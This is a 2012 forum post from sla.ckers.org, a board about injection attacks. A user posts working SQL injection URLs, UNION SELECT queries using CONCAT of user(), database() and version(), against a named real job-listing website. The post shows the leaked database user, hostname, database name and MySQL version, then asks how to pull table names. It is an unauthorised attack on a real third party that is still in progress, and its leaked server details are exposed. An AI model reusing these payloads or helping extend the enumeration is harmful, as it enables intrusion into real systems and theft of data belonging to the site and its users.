Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Any one teache me ? A strange SQLi
Posted by: annen
Date: May 30, 2012 09:05PM

http://www.tafejobs.com.au/show.php?title=category_manager__63497 aNd 9=3 uNIOn selecT 1--

<IMG style='border:0px' src='images/job_types/1.gif'><p><strong>Advertiser</strong><br>The University of New South Wales</div><br>

http://www.tafejobs.com.au/show.php?title=category_manager__63497 aNd 9=3 uNIOn selecT CONCAT(user(),0x3a,database(),0x3a,version())--

http://www.tafejobs.com.au/show.php?title=category_manager__63497 aNd 9=3 uNIOn selecT CONCAT(user(),database(),version())--
<IMG style='border:0px' src='images/job_types/unijobsc_shammik@cpanel15.per.syra.net.au:unijobsc_unijobs:5.1.62-cll.gif'><p><strong>Advertiser</strong><br>

user :unijobsc_shammik@cpanel15.per.syra.net.au
database:unijobsc_unijobs
version :5.1.62-cll

But cann't get tablename.......

Options: ReplyQuote


Sorry, only registered users may post in this forum.